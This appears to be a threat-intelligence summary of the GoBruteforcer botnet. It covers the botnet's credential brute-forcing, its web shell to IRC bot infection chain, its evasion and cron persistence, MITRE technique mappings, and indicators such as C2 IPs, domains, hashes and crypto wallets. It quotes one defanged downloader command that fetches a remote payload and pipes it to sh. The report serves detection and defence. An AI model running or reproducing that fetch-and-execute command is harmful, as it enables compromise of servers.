GoBruteforcer is a modular Go-based botnet that brute-forces FTP, MySQL, PostgreSQL and phpMyAdmin credentials to compromise Linux servers and recruit them as scanning and brute-force nodes. The 2025 variant adds an obfuscated Go IRC bot, downloader modules, process-masking and cron persistence, and has been observed targeting crypto project databases and legacy stacks like XAMPP that expose weak defaults #GoBruteforcer #XAMPP
Keypoints
- GoBruteforcer (aka GoBrut) is a Go-written botnet that brute-forces credentials for FTP, MySQL, PostgreSQL and phpMyAdmin to compromise internet-exposed Linux servers.
- The infection chain commonly follows web shell → downloader → IRC bot → bruteforcer modules, with compromised hosts serving as scanners, distribution points, or C2 relays.
- The 2025 variant is fully rewritten in Go, obfuscated with Garbler, packed with UPX (signature patched), and includes process-masking and argv overwriting to evade discovery.
- Campaign drivers include widespread reuse of default/example usernames (amplified by AI-generated deployment snippets) and legacy stacks like XAMPP exposing FTP/phpMyAdmin with weak defaults.
- Operators use IRC-based C2 on custom servers/channels with strict server-side restrictions and message-origin checks to prevent hijacking and monitoring.
- At least one observed campaign targeted crypto projects: operators deployed TRON balance scanners and token-sweep utilities and moved funds to identified TRON and BSC wallets.
MITRE Techniques
- [T1110 ] Brute Force – The botnet systematically attempts common username:password pairs against FTP, MySQL, PostgreSQL and phpMyAdmin (‘GoBruteforcer… brute-forces user passwords for services such as FTP, MySQL, PostgreSQL, and phpMyAdmin on Linux servers.’).
- [T1505.003 ] Web Shell – Initial compromise often involves uploading or using a PHP web shell to deliver additional payloads (‘the typical next step is to upload a web shell into the webroot.’).
- [T1105 ] Ingress Tool Transfer – Downloaders fetch architecture-specific payloads (IRC bot, bruteforcer) via wget/curl and execute them (‘download and execute additional malicious software (such as an IRC bot).’ / example shell downloader shown).
- [T1059 ] Command and Scripting Interpreter – Shell scripts and /bin/sh -c are used for payload execution, updates, and command execution (‘(wget -qO – “http[:]///.x/test2.php?x=`uname -m`” || curl -[sL] …) | sh’).
- [T1053.005 ] Scheduled Task/Job (Cron) – Persistence is maintained via cron entries that restart the binary every five minutes (‘cron, which restarts the binary every five minutes (*/5 * * * * ).’).
- [T1071.004 ] Application Layer Protocol: IRC – The bot communicates with operators over IRC channels for command-and-control (‘an IRC bot that enables remote control of the compromised host’ and detailed IRC interaction described).
- [T1027 ] Obfuscated Files or Information – Binaries are obfuscated with Garbler and packed with UPX (with patched signature) to hinder analysis (‘all samples are obfuscated with Garbler… packed with UPX.’).
- [T1036 ] Masquerading – The malware alters its visible process name and overwrites argv to masquerade as legitimate system processes (fake process name used is ‘init’ and argv is replaced so tools show ‘init’).
- [T1041 ] Exfiltration Over Command and Control Channel – Successful credentials are reported back to C2 via HTTP GET requests to a /pst endpoint (‘exfiltrated via a plain HTTP GET request to the C2’s /pst endpoint’).
- [T1078 ] Valid Accounts – Discovered weak credentials are reused to create backdoor accounts, steal data, and expand access (‘Newly discovered weak credentials are used to steal data, create backdoor accounts, sell access, and expand the botnet.’).
Indicators of Compromise
- [IP address ] C2 servers and observed infrastructure – 190.14.37.10, 93.113.25.114
- [Domain ] C2 / distribution domains – xyz.yuzgebhmwu[.]ru, fi.warmachine[.]su, and 3 more domains (pool.breakfastidentity[.]ru, pandaspandas[.]pm, my.magicpandas[.]fun)
- [File hash ] Malware and webshell samples – de7994277a81cf48f575f7245ec782c82452bb928a55c7fae11c2702cc308b8b (PHP web shell), 7423b6424b26c7a32ae2388bc23bef386c30e9a6acad2b63966188cb49c283ad (IRC bot), and 7 more sample hashes
- [File name / script ] Downloader/updater and bruteforcer helpers – init_start, init_stop (used by the downloader/updater workflow)
- [Crypto wallet ] Attacker recipient addresses observed on-chain – TRON TF5LUPC7MQWMcCgRLThY1v8zsHuoz1sBZW, BSC 0x208a8Ce726443B7ED9B621be70Cee7b2bB6723B2